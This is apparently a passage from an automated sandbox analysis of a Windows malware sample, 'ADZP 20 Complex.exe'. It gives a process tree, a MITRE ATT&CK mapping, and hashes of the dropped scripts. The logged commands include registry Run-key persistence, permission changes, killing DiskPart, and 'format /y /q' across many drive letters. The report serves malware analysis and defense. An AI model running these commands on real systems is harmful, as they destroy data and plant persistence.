    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12440
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:14312
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:14632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:16060
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2352
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1888
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1016
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:1356
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:1812
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5F7E.tmp\5F7F.tmp\5F80.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:10692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11896
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:12900
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:13200
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12892
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12676
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:14708
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:15884
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1304
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:960
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2128
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:2796
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:3032
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6345.tmp\6346.tmp\6347.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:11644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:12268
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:13536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:13636
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:13716
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12804
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:14312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:16588
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:7024
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6356
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7120
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:3420
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:5284
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\69DA.tmp\69DB.tmp\69DC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:12168
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:12464
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:13388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:13324
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12404
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:15028
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:15428
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:16516
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:3428
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6804
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7180
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:7192
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:7212
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D63.tmp\6D64.tmp\6D65.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:11540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:12524
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:13960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:14220
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:13364
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:14856
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:7008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:16984
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:7224
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:7240
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7268
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:7292
- - C:\Windows\system32\icacls.exe
    icacls "C:\Program Files"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:7308
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Program Files"
    3⤵
    - Views/modifies file attributes
    PID:7404
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:9244
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:9504
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:9772
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:9928
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:4480
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:1048
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:1980
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:4424
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:6360
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:10660
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:10736
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:10836
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:11024
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:11040
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:10892
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:11148
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:11188
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:11252
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:9968
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:10336
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:10340
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6688
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:10960
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:10344
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:10564
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:10632
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4552
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:10560
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:10704
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:11004
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:11368
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:11592
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:11684
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:12032
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:12080
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:12148
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:12208
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:12248
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:11488
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:6756
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:16804
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:16444
- - C:\Windows\system32\format.com
    format /y /q N:
    3⤵
    PID:14672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2142894921687849993-1632346258-1279150917-470373907-817425575-552154949-2032777134"
1⤵
PID:2104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-134078034-736350334-1816819523-359597332-659218796-1128982837-2078319858846660291"
1⤵
PID:5196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1115882367579195005-1894019911-1158822041-2040888291587637639878934548574118214"
1⤵
PID:5236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1056.tmp\1057.tmp\1058.bat

Filesize
17KB

MD5
190e7cfa7d6de532ba4498ca3d38b47d

SHA1
7d4ea5ce61962c0445d955a44dd31226fa8c736e

SHA256
faee2b0ac2218435a6973b87277b29010c988efefdcd7fe0e107808c2cc0f282

SHA512
5a87b4bac67957acbc6dfab08cf9b3e1110e4b496b66110a44f7b2d0ec75b950d7569b6220c4a5ab3597db032e70b16d5a5e6ee4ab23102f6d12fea7bdc11598

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
300B

MD5
88a2fcd93445c8b092324fe1236d31dc

SHA1
f63653fe34d54b7e42e29689a934ed097329128d

SHA256
0783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419

SHA512
3e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
120B

MD5
6bc9ab9854695874c5338bd08dde7db5

SHA1
8ae8dc91cd8b80dd688378a3eacb2750e2de8c3c

SHA256
d4249fbe2df7ddc684f61bbba98e5d3312c85e5787d5500a73ff18a5abce76eb

SHA512
e8fda27e7d1144816879b84fa04b8b3a7063f3841e57a1aaa918b5dfa1dc35f0f4380f89ca861c59ea45d884488e68309dabff15200e6b99038df4431e439f85

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
180B

MD5
b2206e980c51067d6e9dd7575d842bdc

SHA1
5aa6f76eee9efd569089be7f363e30ebf0531a22

SHA256
add106f3d6e9cfd2fac3d14a74d6791a9caa257b9c7e105a9a5fc2a309337ecd

SHA512
89ab3ca635f8fdcb1206f0a1d585355a730506cc1d72ca666f1e9d650b24107368349b44ab0b3d3132442a2fc61c0c9404d00b717a61f305d9c93d5d638d9bec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
240B

MD5
482dcfe952218cf31ad2adddd8f6616b

SHA1
7a6bcfce28c76bc3319c871696531d21200f3bc0

SHA256
093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5

SHA512
440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
60B

MD5
11aa52a7eca2cf8fdcd1584b5a8b6026

SHA1
01ae6066e6b3879cb0caf306cc91077b7c0bea1e

SHA256
8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11

SHA512
07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
444B

MD5
929d76643e667f8d6faa590f5cfee782

SHA1
e120fdfc91c88681f835b703c336908b9cd4b649

SHA256
dedb3209e6ffe8a68578145eda5a34b9f64108c4ccb3b228fb9fa3d7ada5380a

SHA512
bfd61aaf55a50d3c4bbb0386ac02aebfdf14fb8d009bc47eb0e6398b49229222e3c0b7d23b22b235efa14398d6340084d0b9b683bbd9c3ab2f66c0a6d27a4171

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
222B

MD5
05a4d4594b598cfe885bf862787b8cde

SHA1
dfb26e156e88af25bd00db0bc788b81c521a4db9

SHA256
fd8427db8c0c5ad2c7a8fc36c18f9400e25bdd7dfd1d267ec11a7a94bdbd1cab

SHA512
ac1f87eabd69e1939f463c8710cdd1ba8a886ad6509d26d0fac4e09ab82056cf952b7a0cf2ecb55bb0549fdb0aff6457133eeb6b7b222df58f773f91df101136

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
296B

MD5
b20421aba6b1738af56e402aed7b5fca

SHA1
7b9e8f147c25a383e775cf4ce66fec5f050f8187

SHA256
2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd

SHA512
32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
4KB

MD5
ac7817afa5d8327b08217451492b6bc0

SHA1
079a031f621e3e14edf2b8064c3ae4d9904411ca

SHA256
8c890d59419f42a6dccb3acfabafbcafb50999260b85a3090e10701d50e7db03

SHA512
efa0566b9ac7ab974eb14f2ab713a3e075580285ba86ac59844645acadd0146781a0f29952f50f068d7c59ac3ee2d353d27cda01f525339e7cf6fd041a3315f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
274B

MD5
e8154d032d09f3a8141d83a5c37bca37

SHA1
2056b4fd9315b05ec898a9a8ae3fd3f71725e178

SHA256
cd006059daa5d7a94ab2174eadc5e512dcb6a0e00dcdf780cc7b82feef47dc5d

SHA512
68ea57415e45d15f1d06daee04f91f850c042be59009029810661998870e34bea6363d85a2051dce1c15ecf0fb2074c10a21c539fdda9f0fbea58fb77bf2974c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
284B

MD5
6ec3a54dfa09bdcba05bd7c9ea01792f

SHA1
828465313f64b314f060c34d52485b965aa8abd5

SHA256
41ebd6f69ab8e745a83168c49ce9a11f8fce6946bb301ca20ee0d3a832a170b7

SHA512
9db646101a411d6e39e549397bf465a009ed72ee1707d3ee8e7be3fdedf23ef0a785657c773344701fe6afa966cfda3a09e2d584b18da941803fc98e26b1ae6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
328B

MD5
86c0f82eaa323b551b5e34301e898620

SHA1
78e9ec7a356cc8a3c4b75d92f02bc1b67b783202

SHA256
be827ac828fe8a4c0fc801c0061f47eaf0b346fab66c385f5ca444f87bf743a8

SHA512
1355e247c224c5b2ecf106a7404d0984b077f467aaa33e96580859e2ad18e505a9c05d61956e4ac769b828512b1ef7e916ddc7bee275bbb22044de74e09f645d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
108B

MD5
aea78da25dd9a4226b49abfadcc3977c

SHA1
1ae73fa0157801a3c42074f6d057712de6427e31

SHA256
18d5c5a71bb9b2414e4a08a52eeacf10961f29c5c582964b3507896be885b3a4

SHA512
f4a2c037f59680fe9d7931866fac1d28c3006e1fbf128ff8b6cb8f3edd54b32854e3a51839f8aca9288e657ece7dd645875ef4db1160c92d1f515137fb245ada

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
162B

MD5
d5980bf4b018e4c397df95afe8941c66

SHA1
ce53c669a898d09479831bc59bc31a5fba2a6f2b

SHA256
9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a

SHA512
c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
216B

MD5
7659392a12010d8c761cb9888f6fd5ac

SHA1
b8829c26628740b77ab7405c231f420e860d8c1f

SHA256
71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431

SHA512
5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
54B

MD5
888e64c554686bbbc0499057cce1af36

SHA1
5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006

SHA256
616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d

SHA512
9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
414B

MD5
873781e160d6c7a2c7100536f95e373a

SHA1
439389553b0f4b61327c0160a92e4c8ddca8f84d

SHA256
e244905c9acc529b7d7dbd58453f44dbd3f3d627bba23adcf375afde9b6b2a35

SHA512
1116b365d1e44dbad9fcdf462bb3467dbe3ab8b40a01c7dc6d516b24d2b1260c405cbda80f7a1177f89412a2db726a68e6ae2ceee839c117061ecbb75a06a4aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
483B

MD5
21321634b2c2bf8223d389be19d13d4e

SHA1
116c0af8712cc2120fbb6c4893f9a99a77242960

SHA256
fa1ddb950fadc33035dc70e015155e7db6fefaddc05d83cc1fab233e3c416f60

SHA512
feea91421292af2cb0348c6c09b2bbe810f3a3385c5b5ddbb7e6312aa7f97f48eebf10d6f9966b2fee8f4e843e87ceabf78318c9ac9b070478f0372471acce20

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
1KB

MD5
0e0fdf07d18679a4247c04617d690fcc

SHA1
efdf4875fe6a971732bace4b9dbe633b96dbfb93

SHA256
1ac6e624af7fd0facb00d0655c576f6082ce18a2e8115467e132a082bbbd8b87

SHA512
c1f9ffe01ea03da76db3f389d94c8d1070da5ac7da5b6be7e1e0bea77aa03ac4306bf7faa8fbb6079b7715c85828b6440d4a9dedc2436747fa8bd4c947c92c7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
1KB

MD5
1a6ec368f56ce8ad4ea40ab656ab7d4e

SHA1
206134199d1cb2c54495f6e85ebc27d5ddd9f146

SHA256
5daced86e921ca9d1073beb433d513dbc1c7bb13142276463904cf70c14607f0

SHA512
9f34aa8c1041d9685058f882d1cafd6609cf923f79c9fcc57f1c2cfcccc790f8ad84b2b3dae4771125b9a9500f8969ddda4f1f7f9a2d05fffb40182e2130d522

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
1KB

MD5
a83893ec815bc4fe7451462bc1d9dd42

SHA1
b3c21d6933ba3819b64f2e8713ee4bb9f5618e7e

SHA256
2bafa260ea9f60c51693a8b4d5907480a169c2f06bf7defbec332244134fecab

SHA512
19c316009a7ec25408f15f16ab9145d1ca177716b6eb2b3c51baede260cc66ffa788e5db3bb6b99abb42ef46adcc5d820a0e875c73d2a7d2614bbb198baa10ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
2KB

MD5
5a06479de779634d04c17281bd687321

SHA1
983ce36db43a1c6da16a927f0605e4fcf5afef0d

SHA256
ff9a2d1ac3dfe983b0b6aa99d4d46ac7e1be12ad959785a7912ebdae1478b4da

SHA512
198019f1dc18537282da635015328b6393a5d4722f3ff55d46d8a55d1b1d771de84f0d34dd6062ad001609bfc235bf6ab80c33c8f6335315628803579db92b9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
207B

MD5
d3715d7f77349116a701484780269375

SHA1
589c48410637ac33431569b867070a51c4de5b1c

SHA256
ea0bdd86d283aba33d619aeecb5087ad9132b58e8ae7121e3c3774504abb976a

SHA512
9526a79ac4f9a18104f8e84d684136eef9b6bbccfe772d1d1030d9be02de2f7221cdee248ec748971551a42ed1d8fb1c8a9d820b837164f68376cdee1dc8ff3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
276B

MD5
089381a847f01ba0962ae00f0d92d5e8

SHA1
9f3240f89871639778a318e0cadccafcf9d7c55e

SHA256
2cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05

SHA512
89fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
69B

MD5
72946942abf5cf295f726b816c531ebf

SHA1
8ac5ccae8003c3776c2e0ee0959a76c8bc913495

SHA256
d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25

SHA512
2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
1KB

MD5
8d42b25e34da75cd09d10b534d7a6012

SHA1
a408aa5cb02089156497c1976c7fe41dd42f06d9

SHA256
d20e9eb2185a2d21b55a5f1ae338e500337d8a43c117c0929c0e3233a58bea1a

SHA512
ead990dff8a6a1d47ca32ad4899e48261c2c628afa5d25cc201ce6c1406a8a52cff6be0718964641b3f610160277122fcfdcb93ac0b68d050effc3e2fc26f8fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
3KB

MD5
3fa7d30ef165531b4c1d08cf36fc863e

SHA1
a94fed4c7087f76829f4554d2363ce4ac3e0424c

SHA256
a419a4acec217719cd1e81b00cce18197049f90fa85700adbe28c175b2e1e318

SHA512
c070bb0a6789f600f129d1ba09ebba60c6360a3e971d0844c0abaac2cc9fd4d471efb636610f6c7fe5add00f7735858a5735957ab7a23cafbc0e9ecb70cc9d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
4KB

MD5
206910c0a704af6c223f6a44843b770e

SHA1
74361dab5e0772dab49128b2e9b3f68de2b030b3

SHA256
4bca7bb1659ab1f6d34b5f6a295fdbab638e8478e868ab2a772839c01ae2caf7

SHA512
f27da85ed007fc24cfe0327ef08d9facaa4d5fb735131c159da52bfb536618e3ac7cabd9f50e80f26028ec66d9eeb9ef7b5a15d419395796c0a127805094dfdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
519B

MD5
03f0ef4961ee3f5ebc91e222ad5c3a55

SHA1
130947f0716f672e1c0577f60471dfbd9d1f3435

SHA256
b2cf1c83480bb2e69599e063be75ef8188b20c82a03998098d13d42c11502d21

SHA512
641784c8422a15360449ae9d79722e4d6d5752ef8db0a6cd8e1d71e78c5994dc9e790f5e875a7314be603feb42badc587bf79e8f682aa94b2335443ea8592671

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
655B

MD5
d72c8f42da75fd710f2c2049ef99ae22

SHA1
4ba68526f571015d92d168d782bef2279886c64e

SHA256
2888909ce97c3aec42762412c31a8dec522a38dd3c4f37392efed2f22cd6ea93

SHA512
aab64bb5c94670d6154e5d72239390c9e484100b5563ab5a67e1495c4d374ed8cbdb6d84d6bd7e72816173b5a25c1c52ad9e18468d5d7444e1c44216f85b9811

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
692B

MD5
6989502044e4a9fca67e9ded25de9956

SHA1
9a8d099caad939d32599530b27f7db641cbdb8da

SHA256
b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c

SHA512
9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
173B
